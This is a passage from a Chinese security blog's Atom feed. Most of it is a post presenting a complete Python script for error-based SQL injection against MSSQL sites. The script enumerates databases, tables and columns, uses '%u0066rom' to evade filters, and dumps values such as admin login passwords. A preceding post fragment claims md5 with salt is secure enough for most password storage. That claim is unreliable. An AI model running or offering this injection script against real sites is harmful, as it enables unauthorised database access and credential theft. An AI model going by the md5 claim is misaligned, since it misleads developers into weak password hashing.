<p>Bcrypt 加密一个密文平均值在68毫秒左右,md5 加密一个密文平均值在0.004毫秒左右,性能大约差距16000倍。<br>采用md5 一秒大约能加密 250000个密文<br>采用Bcrypt 一秒大约能加密 14个密文<br>所以,如果你要将Bcrypt用到你的程序中去的话。小应用还好,如果是大应用。您就得按倍数增加服务器了。<br>如果不是给五角大楼写程序,其实md5+salt安全性已经足够了。</p>
]]></content>
<summary type="html">
<p>在php5.5中,加入了一个新的密码哈希函数,可使用Bcrypt轻松实现加盐的安全密码。</p>
<p>bcrypt和其他对称或非对称加密方式不同的是,不是直接解密得到明文,也不是二次加密比较密文,而是把明文和存储的密文一块运算得到另一个密文,如果这两个密文相同则验证成功。
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="php" scheme="http://wps2015.org/tags/php/"/>
</entry>
<entry>
<title>基于mssql的报错注入的脚本(get)</title>
<link href="http://wps2015.org/2015/04/07/script-of-mssql-error-based/"/>
<id>http://wps2015.org/2015/04/07/script-of-mssql-error-based/</id>
<published>2015-04-07T13:02:13.000Z</published>
<updated>2016-11-08T01:44:35.011Z</updated>
<content type="html"><![CDATA[<p>在进行mssql注入的时候,由于各种各样的原因,我们不能使用工具进行值得获取,那么可以自行编写脚本来获取值,python由于其良好的抓取网页的功能,被大家广泛使用。<a id="more"></a></p>
<p>对于get型的mssql的报错注入,代码如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line">#! /usr/bin/</span><br><span class="line">env python</span><br><span class="line">#coding=utf-8</span><br><span class="line">import re</span><br><span class="line">import urllib</span><br><span class="line">import urllib2</span><br><span class="line">#从访问链接中获取报错信息</span><br><span class="line"></span><br><span class="line">def getcontent(payload): #获取网页内容</span><br><span class="line"> url1=url+"AND ("+payload+")=1 --- "</span><br><span class="line"> content = urllib.urlopen(url1).read()</span><br><span class="line"> print content</span><br><span class="line"> return content</span><br><span class="line"></span><br><span class="line">#从报错回显中提取数值</span><br><span class="line">def getdata(content):</span><br><span class="line"> patt = re.compile("nvarchar.*?'(.*?)'.*?int")</span><br><span class="line"> data = patt.findall(content)</span><br><span class="line"> if data:</span><br><span class="line"> return data[0]</span><br><span class="line"> else:</span><br><span class="line"> return None</span><br><span class="line">#获取当前数据库名</span><br><span class="line">def getcurrentdb():</span><br><span class="line"> payload = 'db_name()'</span><br><span class="line"> content = getcontent(payload)</span><br><span class="line"> data = getdata(content)</span><br><span class="line"> print "current_db: "+data</span><br><span class="line"> return data</span><br><span class="line">def gettablename(dbname,n): #获取表名</span><br><span class="line"> tablelist1=[]</span><br><span class="line"> for i in range(n):</span><br><span class="line"> payload = "select top 1 name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' and name not in(select top "+str(i)+" name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' order by name) order by name"</span><br><span class="line"> try:</span><br><span class="line"> content = getcontent(payload)</span><br><span class="line"> data = getdata(content)</span><br><span class="line"> #print data</span><br><span class="line"> if data not in tablelist1:</span><br><span class="line"> tablelist1.append(data)</span><br><span class="line"> else:</span><br><span class="line"> break</span><br><span class="line"> except:</span><br><span class="line"> continue</span><br><span class="line"> print tablelist1</span><br><span class="line"> print '--------------------'</span><br><span class="line"></span><br><span class="line">def getcolumns(dbname,table,n): #获取列名</span><br><span class="line"> tablelist2=[]</span><br><span class="line"> for i in range(n):</span><br><span class="line"> payload="Select top 1 name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') and name not in (Select top "+str(i)+" Name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') order by name) order by name"</span><br><span class="line"> try:</span><br><span class="line"> content = getcontent(payload)</span><br><span class="line"> data = getdata(content)</span><br><span class="line"> if data not in tablelist2:</span><br><span class="line"> tablelist2.append(data)</span><br><span class="line"> else:</span><br><span class="line"> break</span><br><span class="line"> except:</span><br><span class="line"> continue</span><br><span class="line"> print table</span><br><span class="line"> print tablelist2</span><br><span class="line"> print '--------------------'</span><br><span class="line">def getvalue(dbname,table,column,n): #获取各字段的值</span><br><span class="line"> tablelist3=[]</span><br><span class="line"> for i in range(n):</span><br><span class="line"> payload="select top 1 "+column+" %u0066rom "+table+" where "+column+" not in(select top "+str(i)+" "+column+" %u0066rom "+table+" order by id)order by id"</span><br><span class="line"> try:</span><br><span class="line"> content = getcontent(payload)</span><br><span class="line"> data = getdata(content) </span><br><span class="line"> if data not in tablelist3:</span><br><span class="line"> tablelist3.append(data)</span><br><span class="line"> else:</span><br><span class="line"> break</span><br><span class="line"> except:</span><br><span class="line"> continue</span><br><span class="line"> print column</span><br><span class="line"> print tablelist3</span><br><span class="line"></span><br><span class="line">if __name__ == "__main__":</span><br><span class="line"> url="http://www.example/pages/BulletinPage.aspx?id=21"</span><br><span class="line"> global url</span><br><span class="line"> db=getcurrentdb()</span><br><span class="line"> gettablename('saa',200)</span><br><span class="line"> getcolumns(db,'Admin_Login',50)</span><br><span class="line"> getvalue(db,'Admin_Login','LoginPwd',50) #可自行选择注释,只留你需要的那个函数进行值得获取</span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<p>在进行mssql注入的时候,由于各种各样的原因,我们不能使用工具进行值得获取,那么可以自行编写脚本来获取值,python由于其良好的抓取网页的功能,被大家广泛使用。
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
</feed>